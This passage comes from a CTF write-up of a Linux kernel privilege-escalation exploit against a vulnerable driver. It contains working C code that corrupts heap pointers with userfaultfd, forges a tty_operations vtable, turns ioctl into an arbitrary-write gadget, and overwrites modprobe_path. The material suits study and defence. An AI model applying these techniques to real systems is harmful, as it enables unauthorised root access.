    ioctl_add_desc(0, (uint8_t *)0xcccf00);

    // Re-add book0, then repair the next pointer that follows so that it
    // refers to the original next_ptr again.
    ioctl_add(0);
    memset(buf, 0, BOOK_DESCRIPTION_SIZE);
    ((uint64_t *)(buf + 32))[512/8] = next_ptr;
    ioctl_add_desc(0, buf);

An additional step I perform after overwriting the first next_ptr is to fix the following next_ptr so that it points to the original next_ptr (which will become book2).

A bug that took me some time to fix: I was trying to write heap_ptr + 32 inside uf_page, but that triggered the page fault in user space. To work around it I mmapped uf_page with a size of 0x2000 bytes and registered only the first 0x1000 bytes with userfaultfd. This way I can write heap_ptr + 32 at uf_page + 0xf00 + 0x200 without problems, and pass 0xcccf00 as the pointer to add_desc, which triggers the page fault inside the kernel as intended.

4th stage

tty_operations is the virtual table used by the tty, since SMAP is active we can’t craft a fake vtable in user-space. However we can forge a fake vtable inside book2 since we have its address.

struct tty_operations {
        struct tty_struct *        (*lookup)(struct tty_driver *, struct file *, int);   /*     0     8 */
        int                        (*install)(struct tty_driver *, struct tty_struct *); /*     8     8 */
        void                       (*remove)(struct tty_driver *, struct tty_struct *);  /*    16     8 */
        int                        (*open)(struct tty_struct *, struct file *);          /*    24     8 */
        void                       (*close)(struct tty_struct *, struct file *);         /*    32     8 */
        void                       (*shutdown)(struct tty_struct *);                     /*    40     8 */
        void                       (*cleanup)(struct tty_struct *);                      /*    48     8 */
        int                        (*write)(struct tty_struct *, const unsigned char  *, int); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        int                        (*put_char)(struct tty_struct *, unsigned char);      /*    64     8 */
        void                       (*flush_chars)(struct tty_struct *);                  /*    72     8 */
        int                        (*write_room)(struct tty_struct *);                   /*    80     8 */
        int                        (*chars_in_buffer)(struct tty_struct *);              /*    88     8 */
        int                        (*ioctl)(struct tty_struct *, unsigned int, long unsigned int); /*    96     8 */
        long int                   (*compat_ioctl)(struct tty_struct *, unsigned int, long unsigned int); /*   104     8 */
        void                       (*set_termios)(struct tty_struct *, struct ktermios *); /*   112     8 */
        void                       (*throttle)(struct tty_struct *);                     /*   120     8 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        void                       (*unthrottle)(struct tty_struct *);                   /*   128     8 */
        void                       (*stop)(struct tty_struct *);                         /*   136     8 */
        void                       (*start)(struct tty_struct *);                        /*   144     8 */
        void                       (*hangup)(struct tty_struct *);                       /*   152     8 */
        int                        (*break_ctl)(struct tty_struct *, int);               /*   160     8 */
        void                       (*flush_buffer)(struct tty_struct *);                 /*   168     8 */
        void                       (*set_ldisc)(struct tty_struct *);                    /*   176     8 */
        void                       (*wait_until_sent)(struct tty_struct *, int);         /*   184     8 */
        /* --- cacheline 3 boundary (192 bytes) --- */
        void                       (*send_xchar)(struct tty_struct *, char);             /*   192     8 */
        int                        (*tiocmget)(struct tty_struct *);                     /*   200     8 */
        int                        (*tiocmset)(struct tty_struct *, unsigned int, unsigned int); /*   208     8 */
        int                        (*resize)(struct tty_struct *, struct winsize *);     /*   216     8 */
        int                        (*get_icount)(struct tty_struct *, struct serial_icounter_struct *); /*   224     8 */
        int                        (*get_serial)(struct tty_struct *, struct serial_struct *); /*   232     8 */
        int                        (*set_serial)(struct tty_struct *, struct serial_struct *); /*   240     8 */
        void                       (*show_fdinfo)(struct tty_struct *, struct seq_file *); /*   248     8 */
        /* --- cacheline 4 boundary (256 bytes) --- */
        int                        (*proc_show)(struct seq_file *, void *);              /*   256     8 */

        /* size: 264, cachelines: 5, members: 33 */
        /* last cacheline: 8 bytes */
};

There are some functions whose parameters we control from user space; for example, with ioctl we control esi and rdx. Basically, our syscall ioctl(ptmx, esi, rdx) becomes ioctl(&tty_struct, esi, rdx). I tried with write, but its arguments don’t seem to be controllable through the parameters passed to write in user space (maybe I was doing something wrong). We could also overwrite the address of the tty_driver inside the struct and try to call remove, install or lookup to control rdi, but I didn’t try.

I found https://pr0cf5.github.io/ctf/2020/03/09/the-plight-of-tty-in-the-linux-kernel.html that gives some tips on what gadgets are useful.

I found with ROPgadget:

103448:0xffffffff8113e9b1 : mov dword ptr [rdx], esi ; ret // WRITE
122013:0xffffffff81034e74 : mov rax, qword ptr [rsi] ; ret // READ

I opted to overwrite modprobe_path to read the flag. Another strategy was to read the list of task_structs until I found my process and then use the write primitive to set its uid to 0. However, I would have needed the right offsets (they depend on the kernel version and compilation flags), and modprobe_path was easier.

So my plan was the following (in red the tty_struct):

    // 4th stage write on modprobe_path
    ioctl_add(1);
    ioctl_add(2);

    // Build a fake tty_operations table inside book2's description. Offsets
    // 32, 40 and 48 are close, shutdown and cleanup; offset 96 is ioctl.
    ((uint64_t *)buf)[32 / 8] = dummy_ret; // cleanup functions
    ((uint64_t *)buf)[40 / 8] = dummy_ret;
    ((uint64_t *)buf)[48 / 8] = dummy_ret;
    ((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // ioctl function -> arb write gadget
    ioctl_add_desc(2, buf);
    ioctl_get_desc(2, buf);

    // This part is not needed
    // Writes index/next/prev values into the last 0x20 bytes of book1's
    // description.
    book_details b = {
        .index = 0,
        .next = (void *)(heap_ptr + 32),
        .prev = NULL,
    };
    memcpy(buf + BOOK_DESCRIPTION_SIZE - 0x20, &b, 0x18);
    print_leak((uint64_t *)buf, BOOK_DESCRIPTION_SIZE);
    ioctl_add_desc(1, buf);

Then:

    // Free book1 and let the tty_struct allocated by open() take its place.
    ioctl_remove(1);

    ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    // book1 sits at &book0 + 32, so book0's description overlaps the
    // tty_struct: read it back first to keep its other fields intact.
    ioctl_get_desc(0, buf);

    memset(buf, 0, BOOK_DESCRIPTION_SIZE);
    memcpy(buf, leak, BOOK_DESCRIPTION_SIZE);
    // Index 7 = byte 56 of book0 = 32 + 24, i.e. the tty_struct's ops field.
    ((uint64_t *)buf)[7] = next_ptr; // overwrite pointer to vtable
    ioctl_add_desc(0, buf);

    // Each call runs the "mov dword ptr [rdx], esi" gadget: the 4 bytes passed
    // as the command are written to the address passed as the argument.
    ioctl(ptmx, *(int *)new_modprobe_path, modprobe_path); // trigger ioctl call inside vtable
    ioctl(ptmx, *(int *)(new_modprobe_path + 4), modprobe_path + 4);
    ioctl(ptmx, *(int *)(new_modprobe_path + 8), modprobe_path + 8);

    // Create a file that starts with the bytes ff ff ff ff and a helper script,
    // then execute the file.
    // NOTE(review): new_modprobe_path is presumably "/home/ctf/a" — confirm
    // against the full exploit.
    system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/bho");
    system("chmod +x /home/ctf/bho");
    system("echo -ne '#!/bin/sh\nchmod 777 /flag.txt' > /home/ctf/a\n");
    system("chmod +x /home/ctf/a");
    system("/home/ctf/bho");

Exploit

exploit

To upload the exploit on the server I recommend to compile with musl-gcc:

musl-gcc exploit.c -o /tmp/exploit -static -lpthread

For arch linux download:

yay -S musl kernel-headers-musl

Flag

3k{SM4P_4LWAYS_MAKES_1T_D1FFICULT_BUT_N0T_IMP0SSIBLE}

But

Everything works, but I wanted to control RIP with a ROP chain. To do that I tried to find a stack-pivot gadget that sets rsp to the address of book2, and to write inside book2 a ROP chain that calls commit_creds(prepare_kernel_cred(0)). I wasn’t able to find such a gadget 😐.

tty_driver remove

There is this gadget, 0xffffffff816467dd : push rdi ; pop rsp ; imul esp, dword ptr [rdx + 0x72], 0x616cef89 ; retf, that could maybe be used as a stack pivot. To reach it I tried to invoke the remove operation with close(ptmx). I set the tty_driver pointer inside the tty_struct to &book2 + 256 (+256 because the first 256 bytes hold the fake tty_operations vtable). Then I copied a fake tty_driver struct there and changed its ops to point to next_ptr = &book2. This is needed because the remove operation is called through the tty_driver, not the tty_struct (https://elixir.bootlin.com/linux/v5.10.38/source/drivers/tty/tty_io.c#L1324). However, I get a page fault after the push rdi, and I don’t know why 😐.